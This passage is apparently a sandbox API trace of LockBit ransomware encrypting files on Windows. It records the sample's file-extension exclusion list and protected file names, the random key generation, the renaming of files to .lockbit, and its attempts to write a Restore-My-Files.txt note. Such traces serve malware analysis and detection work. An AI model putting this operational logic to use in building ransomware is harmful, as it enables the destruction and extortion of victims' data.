Office\\CLIPART\\PUB60COR\\") returned="" [0116.448] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned=".WMF" [0116.448] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0116.448] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0116.448] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0116.449] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0116.449] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF.lockbit") returned 72 [0116.449] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0116.450] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0116.450] malloc (_Size=0x40068) returned 0x1ff1e60 [0116.450] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5392) returned 1 [0116.450] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0116.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0116.452] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0116.707] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0116.707] malloc (_Size=0xa6) returned 0x77d7a8 [0116.707] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0116.708] free (_Block=0x77d7a8) [0116.708] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0116.708] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0116.708] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0116.708] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD02158_.WMF", cAlternateFileName="")) returned 1 [0116.708] lstrcmpiW (lpString1=".", lpString2="FD02158_.WMF") returned -1 [0116.708] lstrcmpiW (lpString1="..", lpString2="FD02158_.WMF") returned -1 [0116.708] PathFindExtensionW (pszPath="FD02158_.WMF") returned=".WMF" [0116.708] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0116.708] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0116.708] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0116.708] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0116.709] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0116.710] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0116.710] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD02158_.WMF") returned 1 [0116.710] lstrcmpiW (lpString1="ntldr", lpString2="FD02158_.WMF") returned 1 [0116.710] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD02158_.WMF") returned 1 [0116.711] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD02158_.WMF") returned -1 [0116.711] lstrcmpiW (lpString1="autorun.inf", lpString2="FD02158_.WMF") returned -1 [0116.711] lstrcmpiW (lpString1="thumbs.db", lpString2="FD02158_.WMF") returned 1 [0116.711] lstrcmpiW (lpString1="iconcache.db", lpString2="FD02158_.WMF") returned 1 [0116.711] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0116.711] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned=".WMF" [0116.711] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0116.711] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0116.711] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0116.712] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0116.712] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0116.712] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0116.712] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0116.712] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0116.712] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0116.712] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0116.712] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0116.712] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0116.712] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0116.712] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0116.712] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF.lockbit") returned 72 [0116.712] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02158_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0116.713] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0116.713] malloc (_Size=0x40068) returned 0x3d70450 [0116.713] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1648) returned 1 [0116.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0116.714] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0116.714] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0117.011] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.012] malloc (_Size=0xa6) returned 0x77d7a8 [0117.012] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.013] free (_Block=0x77d7a8) [0117.013] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.013] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.013] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.013] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc38, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD02161_.WMF", cAlternateFileName="")) returned 1 [0117.013] lstrcmpiW (lpString1=".", lpString2="FD02161_.WMF") returned -1 [0117.013] lstrcmpiW (lpString1="..", lpString2="FD02161_.WMF") returned -1 [0117.013] PathFindExtensionW (pszPath="FD02161_.WMF") returned=".WMF" [0117.013] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.013] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.013] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.013] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.013] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.013] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.013] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.013] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.013] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.013] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.014] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.014] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD02161_.WMF") returned 1 [0117.015] lstrcmpiW (lpString1="ntldr", lpString2="FD02161_.WMF") returned 1 [0117.015] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD02161_.WMF") returned 1 [0117.015] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD02161_.WMF") returned -1 [0117.015] lstrcmpiW (lpString1="autorun.inf", lpString2="FD02161_.WMF") returned -1 [0117.015] lstrcmpiW (lpString1="thumbs.db", lpString2="FD02161_.WMF") returned 1 [0117.015] lstrcmpiW (lpString1="iconcache.db", lpString2="FD02161_.WMF") returned 1 [0117.015] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.015] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned=".WMF" [0117.015] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.015] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.016] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.016] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.017] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.017] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.017] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.017] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.017] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.017] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.017] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.017] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.017] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF.lockbit") returned 72 [0117.017] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0117.018] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.018] malloc (_Size=0x40068) returned 0x3e70008 [0117.018] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=3128) returned 1 [0117.018] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.018] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0117.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.019] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0117.019] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0117.033] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.033] malloc (_Size=0xa6) returned 0x77d7a8 [0117.033] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.044] free (_Block=0x77d7a8) [0117.044] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.044] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.044] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.045] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x32b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="FINCL_01.MID", cAlternateFileName="")) returned 1 [0117.045] lstrcmpiW (lpString1=".", lpString2="FINCL_01.MID") returned -1 [0117.045] lstrcmpiW (lpString1="..", lpString2="FINCL_01.MID") returned -1 [0117.045] PathFindExtensionW (pszPath="FINCL_01.MID") returned=".MID" [0117.045] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0117.045] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0117.048] lstrcmpiW (lpString1=".exe", 